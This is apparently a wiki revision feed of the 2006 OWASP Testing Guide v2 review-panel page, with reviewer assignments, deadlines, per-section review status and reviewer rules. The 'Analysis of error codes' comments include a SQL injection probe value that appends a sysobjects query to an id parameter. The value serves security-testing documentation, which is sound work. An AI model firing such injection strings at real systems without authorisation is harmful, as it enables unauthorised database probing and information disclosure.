Matteo G.P. Flora,&lt;br /&gt;
Matteo Meucci,&lt;br /&gt;
Eoin Keary,&lt;br /&gt;
Stefano Di Paola,&lt;br /&gt;
James Kist,&lt;br /&gt;
Vicente Aguilera,&lt;br /&gt;
Mauro Bregolin,&lt;br /&gt;
Syed Mohamed A&lt;br /&gt;
&lt;br /&gt;
We can begin the 1st reviewing phase by review all 63 articles (nearly 13 articles per person). The deadline is 15th November at 20.00 (GMT+1) because we have 15th November as 1st deadline for the Autumn of Code Project.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;We are waiting for the following articles &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4.2.2 Spidering and googling (40%, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
4.2.4.2 DB Listener Testing TD (Maybe Eoin?)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.5 HTTP Exploit (0%, Arian J.Evans)&amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.2 Oracle testing TD &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.4 ORM Injection (0%, Mark Roxberry)&amp;lt;br&amp;gt;&lt;br /&gt;
5. Writing Reports: value the real risk&amp;lt;br&amp;gt;&lt;br /&gt;
5.1 How to value the real risk (50%, Daniel Cuthbert, Matteo Meucci, Sebastien Deleersnyder, Marco Morana)&amp;lt;br&amp;gt;&lt;br /&gt;
5.2 How to write the report of the testing (0%, Daniel Cuthbert, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Here is the complete list of articles to be reviewed: &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Introduction --&amp;gt; reviewed by Eoin Keary'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''The OWASP Testing Framework --&amp;gt;...'''&lt;br /&gt;
1 of 1 article to be reviewed &lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.1 Introduction and objectives --&amp;gt;.EK'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.2 Information Gathering (Reviewed by EK) --&amp;gt; Keary'''&lt;br /&gt;
9 of 10 articles reviewed -&amp;gt; &amp;lt;BR&amp;gt; &lt;br /&gt;
* '''Application Discovery''': &lt;br /&gt;
** Reviewed + updated(EK) (Maybe we should include HTTP methods for application descovery, such as HTTP HEAD command?)&amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) If you are referring to things such as &amp;quot;fingerprinting&amp;quot;, it was hinted - and I personally agree on this - to create a new section on Web application fingerprinting. There's however a bit of overlap with Infrastructure configuration management testing&lt;br /&gt;
* '''Analysis of error codes''': &lt;br /&gt;
** Reviewed + updated(EK) &amp;lt;BR&amp;gt;&lt;br /&gt;
** Besides the own error, it would be necessary to speak about the voluntary provocation of errors? (Vicente). Two examples: &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 1: Type error. (original): ?id=276 (test): ?id=X &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 2: Type conversion error. (original): ?id=276 (test): ?id=276 and 1 in (select top 1 name from sysobjects) &amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) Agree with the above. A testing methodology should be formalized, i.e. tester should verify if it is possible to cause information disclosure in error or diagnostic messages by tampering with user-alterable input using a set of techniques (such as type mismatch, overflow/underflow, excess input length, various forms of injection, ...)&lt;br /&gt;
* '''Infrastructure configuration management testing AoC''': &lt;br /&gt;
** Reviewed by EK. '''Not in typical guide structure'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''SSL/TLS Testing AoC''': &lt;br /&gt;
** Reviewed + updated(EK) &amp;lt;BR&amp;gt;&lt;br /&gt;
* '''DB Listener Testing''': &lt;br /&gt;
** '''Incomplete'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''Application configuration management testing''': &lt;br /&gt;
** Reviewed by EK. '''Not typical guide structure'''&lt;br /&gt;
** This is generally a &amp;quot;white box&amp;quot; section. There are no examples of testing the configuration from a remote perspective. If this was the aim of the document, thats fine. '''- Need feedback on this one!!'''&lt;br /&gt;
** ''Sample/known files and directories'': might be good to refer to http://www.owasp.org/index.php/Old_file_testing_AoC ??&lt;br /&gt;
** ''Logging'': Timestamp is also important&lt;br /&gt;
* '''File extensions handling'''&amp;lt;BR&amp;gt;&lt;br /&gt;
** contains the text: &amp;quot;''...To review and expand...''&amp;quot; - '''Is this complete??'''&lt;br /&gt;
** '''Need a second opinion on this one'''!! :)&lt;br /&gt;
* '''Old file testing''': Reviewed by EK&lt;br /&gt;
&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.3 Business logic testing --&amp;gt; Meucci'''&lt;br /&gt;
1 of 1 article reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.4 Authentication Testing --&amp;gt; Roxberry (articles have been edited)'''&lt;br /&gt;
0 of 7 articles to be reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.4 Authentication Testing (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Authentication-Testing-Index-Page.aspx Authentication Testing Index]&lt;br /&gt;
** 4.4.1 Default or guessable (dictionary) user account (80%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Default-or-Guessable-User-Account-Testing-AoC.aspx Default or guessable user account review]&lt;br /&gt;
** 4.4.2 Brute Force (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Brute-Force-Testing-AoC.aspx Brute Force review]&lt;br /&gt;
** 4.4.3 Bypassing authentication schema (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Bypassing-Authentication-Schema-AoC.aspx Bypass Authentication review]&lt;br /&gt;
** 4.4.4 Directory traversal/file include (100%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Directory-Traversal-Testing-AOC.aspx Directory Traversal Testing review]&lt;br /&gt;
** 4.4.5 Vulnerable remember password and pwd reset (90%) Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Vulnerable-Remember-Password-and-Pwd-Reset-AoC.aspx Vulnerable Reset Password review]&lt;br /&gt;
** 4.4.6 Logout and Browser Cache Management Testing (100%) Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Logout-and-Browser-Cache-Management-Testing-AoC.aspx Logout and Browser Cache Management Testing review]&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.5 Session Management Testing --&amp;gt; Syed Mohamed A'''&lt;br /&gt;
5 of 6 articles to be reviewed  &lt;br /&gt;
** 4.5 Session Management Testing (95%)&lt;br /&gt;
** 4.5.1 Analysis of the Session Management Schema (90%)&lt;br /&gt;
** 4.5.2 Cookie and Session token Manipulation (100%)&lt;br /&gt;
** 4.5.3 Exposed session variables (90%)&lt;br /&gt;
** 4.5.4 Session Riding (XSRF) (80%)&lt;br /&gt;
** 4.5.5 HTTP Exploit (0%)&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.6 Data Validation Testing --&amp;gt; Meucci'''&lt;br /&gt;
18 articles reviewed (3 are at 0%)&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.6 Data Validation Testing : Reviewed by EK&lt;br /&gt;
** 4.6.1 Cross site scripting: Reviewed by EK (Reformatted it slightly with wiki tags). '''Not completed'''&lt;br /&gt;
** 4.6.1.1 HTTP Methods and XST Reviewed by MM. Reviewed by AP.&lt;br /&gt;
** 4.6.2 SQL Injection (90%) Reviewed by MM. Reviewed by EK.&lt;br /&gt;
*** Not sure about &amp;quot;inferential&amp;quot; injection definition in &amp;quot;Description of Issue&amp;quot;&lt;br /&gt;
*** Added some reference to Oracle. Corrected English.&lt;br /&gt;
** 4.6.2.1 Stored procedure injection (40%) '''TD (not enough informations)'''&lt;br /&gt;
**4.6.2.2 Oracle testing (0%) '''TD (not enough informations)'''&lt;br /&gt;
** 4.6.2.3 MySQL testing (100%) Reviewed by MM&lt;br /&gt;
** 4.6.2.4 SQL Server testing (95%) Reviewed by MM. '''tools?'''&lt;br /&gt;
** 4.6.3 LDAP Injection (90%) Reviewed by MM added wp and tools&lt;br /&gt;
** 4.6.4 ORM Injection (0%) '''TD (not enough informations)'''&lt;br /&gt;
** 4.6.5 XML Injection (90%) Reviwed and updated by MM. '''WP and tools?'''&lt;br /&gt;
** 4.6.6 SSI Injection (95%) Reviewed by MM &lt;br /&gt;
** 4.6.7 XPath Injection (80%) Reviewed by MM. '''Gray box section is to complete?'''&lt;br /&gt;
** 4.6.8 IMAP/SMTP Injection (95%)Reviewed by MM &lt;br /&gt;
** 4.6.9 Code Injection (70%) Reviewed by MM. '''Not completed'''&lt;br /&gt;
** 4.6.10 OS Commanding (70%) Reviewed by MM. '''Not completed'''&lt;br /&gt;
** 4.6.11 Buffer overflow Testing (100%) Reviewed by MM. '''Note: these tests are not usual web app tests'''&lt;br /&gt;
*** (Bregolin) The point is that these are not black box tests, so where they are now they are misplaced&lt;br /&gt;
** 4.6.11.1 Heap overflow (100%) Reviewed by MM&lt;br /&gt;
** 4.6.11.2 Stack overflow (100%)Reviewed by MM&lt;br /&gt;
** 4.6.11.3 Format string (100%)Reviewed by MM&lt;br /&gt;
** 4.6.12 Incubated vulnerability testing (95%) Reviewed by MM, whitepapers?&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''4.7 Denial of Service Testing--&amp;gt; Revelli'''&lt;br /&gt;
8 of 8 articles Reviewed&lt;br /&gt;
'''[OK] - To do the References'''&lt;br /&gt;
** 4.7 Denial of Service Testing 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.1 Locking Customer Accounts 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.2 Buffer Overflows 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.3 User Specified Object Allocation 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.4 User Input as a Loop Counter 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.5 Writing User Provided Data to Disk 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.6 Failure to Release Resources 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.7 Storing too Much Data in Session 100% Reviewd by Revelli&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.8 Web Services Testing --&amp;gt; Matteo Meucci'''&lt;br /&gt;
6 of 6 articles reviewed&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.8 Web Services Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.1 XML Structural Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.2 XML content-level Testing (90%) Reviewed by Meucci&lt;br /&gt;
** 4.8.3 HTTP GET parameters/REST Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.4 Naughty SOAP attachments (95%) Reviewed by Meucci&lt;br /&gt;
** 4.8.5 Replay Testing (95%) Reviewed by Meucci. '''Need to add code examples, images and proof of impersonation'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.9 AJAX Testing --&amp;gt; Roxberry'''&lt;br /&gt;
3 of 3 articles to be reviewed &lt;br /&gt;
** 4.9 AJAX Testing (70%)&lt;br /&gt;
** 4.9.1 Vulnerabilities (60%)&lt;br /&gt;
** 4.9.2 How to test (60%)&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''5. Writing Reports: value the real risk'''&lt;br /&gt;
We have to write about it. I consider it not yet finished.&lt;br /&gt;
O of 3 articles to be reviewed.&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix A: Testing Tools --&amp;gt;...'''&lt;br /&gt;
1 article of 1: need to update it searching all the guide for paragraps: tools&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix B: Suggested Reading --&amp;gt;...'''&lt;br /&gt;
1 article of 1: need to update it searching all the guide for paragraps: tools&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Appendix C: Fuzz Vectors --&amp;gt; Stefano Di Paola'''&lt;br /&gt;
1 article of 1: Need to be updated&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
Reviewers  Rules &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
1) Check the english language&amp;lt;br&amp;gt;&lt;br /&gt;
2) Check the template: the articles on chapter 4 should have the following:&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Template (http://www.owasp.org/index.php/Template_Paragraph_Testing_AoC)&lt;br /&gt;
&lt;br /&gt;
In some articles we don't need to talk about Gray Box Testing or other, so we can eliminate it.&lt;br /&gt;
&lt;br /&gt;
3) Check the reference style. (I'd like to have all the referenced URLs visible because I have to produce also a pdf document of the Guide).&lt;br /&gt;
I agree with Stefano, we have to use a reference like that:&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;== References ==&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Whitepapers'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [1] Author1, Author2: &amp;quot;Title&amp;quot; - http://www.ietf.org/rfc/rfc2254.txt&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* [2]...&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;'''Tools'''&amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;* Francois Larouche: &amp;quot;Multiple DBMS Sql Injection tool&amp;quot; - http://www.sqlpowerinjector.com/index.htm &amp;lt;br&amp;gt;&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4) Check the reference with the other articles of the guide or with the other OWASP Project.&lt;br /&gt;
&lt;br /&gt;
5) Other?&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13150</id>
		<title>OWASP Testing Guide v2 Review Panel</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=OWASP_Testing_Guide_v2_Review_Panel&amp;diff=13150"/>
				<updated>2006-11-16T16:23:22Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/OWASP_Testing_Guide_v2_Table_of_Contents Table of Contents]]&lt;br /&gt;
&lt;br /&gt;
Update: 15th November, 16.00 (GMT+1)&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Reviewing planning&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
**********************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The reviewers are:&lt;br /&gt;
Mark Roxberry,&lt;br /&gt;
Alberto Revelli,&lt;br /&gt;
Daniel Cuthbert,&lt;br /&gt;
Antonio Parata,&lt;br /&gt;
Matteo G.P. Flora,&lt;br /&gt;
Matteo Meucci,&lt;br /&gt;
Eoin Keary,&lt;br /&gt;
Stefano Di Paola,&lt;br /&gt;
James Kist,&lt;br /&gt;
Vicente Aguilera,&lt;br /&gt;
Mauro Bregolin,&lt;br /&gt;
Syed Mohamed A&lt;br /&gt;
&lt;br /&gt;
We can begin the 1st reviewing phase by review all 63 articles (nearly 13 articles per person). The deadline is 15th November at 20.00 (GMT+1) because we have 15th November as 1st deadline for the Autumn of Code Project.&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;We are waiting for the following articles &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
&lt;br /&gt;
4.2.2 Spidering and googling (40%, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
4.2.4.2 DB Listener Testing TD (Maybe Eoin?)&amp;lt;br&amp;gt;&lt;br /&gt;
4.5.5 HTTP Exploit (0%, Arian J.Evans)&amp;lt;br&amp;gt;&lt;br /&gt;
4.6.2.2 Oracle testing TD &amp;lt;br&amp;gt;&lt;br /&gt;
4.6.4 ORM Injection (0%, Mark Roxberry)&amp;lt;br&amp;gt;&lt;br /&gt;
5. Writing Reports: value the real risk&amp;lt;br&amp;gt;&lt;br /&gt;
5.1 How to value the real risk (50%, Daniel Cuthbert, Matteo Meucci, Sebastien Deleersnyder, Marco Morana)&amp;lt;br&amp;gt;&lt;br /&gt;
5.2 How to write the report of the testing (0%, Daniel Cuthbert, Tom Brennan, Tom Ryan) &amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&amp;lt;br&amp;gt;Here is the complete list of articles to be reviewed: &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;nowiki&amp;gt;&lt;br /&gt;
*********************************************************&lt;br /&gt;
&amp;lt;/nowiki&amp;gt;&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''Introduction --&amp;gt; reviewed by Eoin Keary'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''The OWASP Testing Framework --&amp;gt;...'''&lt;br /&gt;
1 of 1 article to be reviewed &lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.1 Introduction and objectives --&amp;gt;.EK'''&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.2 Information Gathering (Reviewed by EK) --&amp;gt; Keary'''&lt;br /&gt;
9 of 10 articles reviewed -&amp;gt; &amp;lt;BR&amp;gt; &lt;br /&gt;
* '''Application Discovery''': &lt;br /&gt;
** Reviewed + updated(EK) (Maybe we should include HTTP methods for application descovery, such as HTTP HEAD command?)&amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) If you are referring to things such as &amp;quot;fingerprinting&amp;quot;, it was hinted - and I personally agree on this - to create a new section on Web application fingerprinting. There's however a bit of overlap with Infrastructure configuration management testing&lt;br /&gt;
* '''Analysis of error codes''': &lt;br /&gt;
** Reviewed + updated(EK) &amp;lt;BR&amp;gt;&lt;br /&gt;
** Besides the own error, it would be necessary to speak about the voluntary provocation of errors? (Vicente). Two examples: &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 1: Type error. (original): ?id=276 (test): ?id=X &amp;lt;BR&amp;gt;&lt;br /&gt;
*** Example 2: Type conversion error. (original): ?id=276 (test): ?id=276 and 1 in (select top 1 name from sysobjects) &amp;lt;BR&amp;gt;&lt;br /&gt;
** (Bregolin) Agree with the above. A testing methodology should be formalized, i.e. tester should verify if it is possible to cause information disclosure in error or diagnostic messages by tampering with user-alterable input using a set of techniques (such as type mismatch, overflow/underflow, excess input length, various forms of injection, ...)&lt;br /&gt;
* '''Infrastructure configuration management testing AoC''': &lt;br /&gt;
** Reviewed by EK. '''Not in typical guide structure'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''SSL/TLS Testing AoC''': &lt;br /&gt;
** Reviewed + updated(EK) &amp;lt;BR&amp;gt;&lt;br /&gt;
* '''DB Listener Testing''': &lt;br /&gt;
** '''Incomplete'''&amp;lt;BR&amp;gt;&lt;br /&gt;
* '''Application configuration management testing''': &lt;br /&gt;
** Reviewed by EK. '''Not typical guide structure'''&lt;br /&gt;
** This is generally a &amp;quot;white box&amp;quot; section. There are no examples of testing the configuration from a remote perspective. If this was the aim of the document, thats fine. '''- Need feedback on this one!!'''&lt;br /&gt;
** ''Sample/known files and directories'': might be good to refer to http://www.owasp.org/index.php/Old_file_testing_AoC ??&lt;br /&gt;
** ''Logging'': Timestamp is also important&lt;br /&gt;
* '''File extensions handling'''&amp;lt;BR&amp;gt;&lt;br /&gt;
** contains the text: &amp;quot;''...To review and expand...''&amp;quot; - '''Is this complete??'''&lt;br /&gt;
** '''Need a second opinion on this one'''!! :)&lt;br /&gt;
* '''Old file testing''': Reviewed by EK&lt;br /&gt;
&amp;lt;BR&amp;gt;&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.3 Business logic testing --&amp;gt; Meucci'''&lt;br /&gt;
1 of 1 article reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.4 Authentication Testing --&amp;gt; Roxberry (articles have been edited)'''&lt;br /&gt;
0 of 7 articles to be reviewed &lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.4 Authentication Testing (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Authentication-Testing-Index-Page.aspx Authentication Testing Index]&lt;br /&gt;
** 4.4.1 Default or guessable (dictionary) user account (80%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Default-or-Guessable-User-Account-Testing-AoC.aspx Default or guessable user account review]&lt;br /&gt;
** 4.4.2 Brute Force (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Brute-Force-Testing-AoC.aspx Brute Force review]&lt;br /&gt;
** 4.4.3 Bypassing authentication schema (95%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Bypassing-Authentication-Schema-AoC.aspx Bypass Authentication review]&lt;br /&gt;
** 4.4.4 Directory traversal/file include (100%) : Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Directory-Traversal-Testing-AOC.aspx Directory Traversal Testing review]&lt;br /&gt;
** 4.4.5 Vulnerable remember password and pwd reset (90%) Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Vulnerable-Remember-Password-and-Pwd-Reset-AoC.aspx Vulnerable Reset Password review]&lt;br /&gt;
** 4.4.6 Logout and Browser Cache Management Testing (100%) Reviewed by MR [http://www.markroxberry.net/archive/2006/11/14/Logout-and-Browser-Cache-Management-Testing-AoC.aspx Logout and Browser Cache Management Testing review]&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.5 Session Management Testing --&amp;gt; Syed Mohamed A'''&lt;br /&gt;
5 of 6 articles to be reviewed  &lt;br /&gt;
** 4.5 Session Management Testing (95%)&lt;br /&gt;
** 4.5.1 Analysis of the Session Management Schema (90%)&lt;br /&gt;
** 4.5.2 Cookie and Session token Manipulation (100%)&lt;br /&gt;
** 4.5.3 Exposed session variables (90%)&lt;br /&gt;
** 4.5.4 Session Riding (XSRF) (80%)&lt;br /&gt;
** 4.5.5 HTTP Exploit (0%)&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.6 Data Validation Testing --&amp;gt; Meucci'''&lt;br /&gt;
18 articles reviewed (3 are at 0%)&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.6 Data Validation Testing : Reviewed by EK&lt;br /&gt;
** 4.6.1 Cross site scripting: Reviewed by EK (Reformatted it slightly with wiki tags). '''Not completed'''&lt;br /&gt;
** 4.6.1.1 HTTP Methods and XST Reviewed by MM. Reviewed by AP.&lt;br /&gt;
** 4.6.2 SQL Injection (90%) Reviewed by MM. Reviewed by EK.&lt;br /&gt;
*** Not sure about &amp;quot;inferential&amp;quot; injection definition in &amp;quot;Description of Issue&amp;quot;&lt;br /&gt;
*** Added some reference to Oracle. Corrected English.&lt;br /&gt;
** 4.6.2.1 Stored procedure injection (40%) '''TD (not enough informations)'''&lt;br /&gt;
**4.6.2.2 Oracle testing (0%) '''TD (not enough informations)'''&lt;br /&gt;
** 4.6.2.3 MySQL testing (100%) Reviewed by MM&lt;br /&gt;
** 4.6.2.4 SQL Server testing (95%) Reviewed by MM. '''tools?'''&lt;br /&gt;
** 4.6.3 LDAP Injection (90%) Reviewed by MM added wp and tools&lt;br /&gt;
** 4.6.4 ORM Injection (0%) '''TD (not enough informations)'''&lt;br /&gt;
** 4.6.5 XML Injection (90%) Reviwed and updated by MM. '''WP and tools?'''&lt;br /&gt;
** 4.6.6 SSI Injection (95%) Reviewed by MM &lt;br /&gt;
** 4.6.7 XPath Injection (80%) Reviewed by MM. '''Gray box section is to complete?'''&lt;br /&gt;
** 4.6.8 IMAP/SMTP Injection (95%)Reviewed by MM &lt;br /&gt;
** 4.6.9 Code Injection (70%) Reviewed by MM. '''Not completed'''&lt;br /&gt;
** 4.6.10 OS Commanding (70%) Reviewed by MM. '''Not completed'''&lt;br /&gt;
** 4.6.11 Buffer overflow Testing (100%) Reviewed by MM. '''Note: these tests are not usual web app tests'''&lt;br /&gt;
** 4.6.11.1 Heap overflow (100%) Reviewed by MM&lt;br /&gt;
** 4.6.11.2 Stack overflow (100%)Reviewed by MM&lt;br /&gt;
** 4.6.11.3 Format string (100%)Reviewed by MM&lt;br /&gt;
** 4.6.12 Incubated vulnerability testing (95%) Reviewed by MM, whitepapers?&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
* '''4.7 Denial of Service Testing--&amp;gt; Revelli'''&lt;br /&gt;
8 of 8 articles Reviewed&lt;br /&gt;
'''[OK] - To do the References'''&lt;br /&gt;
** 4.7 Denial of Service Testing 100% Reviewed by Revelli&lt;br /&gt;
** 4.7.1 Locking Customer Accounts 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.2 Buffer Overflows 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.3 User Specified Object Allocation 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.4 User Input as a Loop Counter 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.5 Writing User Provided Data to Disk 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.6 Failure to Release Resources 100% Reviewd by Revelli&lt;br /&gt;
** 4.7.7 Storing too Much Data in Session 100% Reviewd by Revelli&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.8 Web Services Testing --&amp;gt; Matteo Meucci'''&lt;br /&gt;
6 of 6 articles reviewed&lt;br /&gt;
'''[OK]'''&lt;br /&gt;
** 4.8 Web Services Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.1 XML Structural Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.2 XML content-level Testing (90%) Reviewed by Meucci&lt;br /&gt;
** 4.8.3 HTTP GET parameters/REST Testing (100%) Reviewed by Meucci&lt;br /&gt;
** 4.8.4 Naughty SOAP attachments (95%) Reviewed by Meucci&lt;br /&gt;
** 4.8.5 Replay Testing (95%) Reviewed by Meucci. '''Need to add code examples, images and proof of impersonation'''&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''4.9 AJAX Testing --&amp;gt; Roxberry'''&lt;br /&gt;
3 of 3 articles to be reviewed &lt;br /&gt;
** 4.9 AJAX Testing (70%)&lt;br /&gt;
** 4.9.1 Vulnerabilities (60%)&lt;br /&gt;
** 4.9.2 How to test (60%)&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
* '''5. Writing Reports: value the real risk'''&lt;br /&gt;
We have to write about it. I consider it not yet finished.&lt;br /&gt;
O of 3 articles to be reviewed.&lt;br /&gt;
&lt;br /&gt;
_________________________________________________________________________________________________________________________&lt;br /&gt;
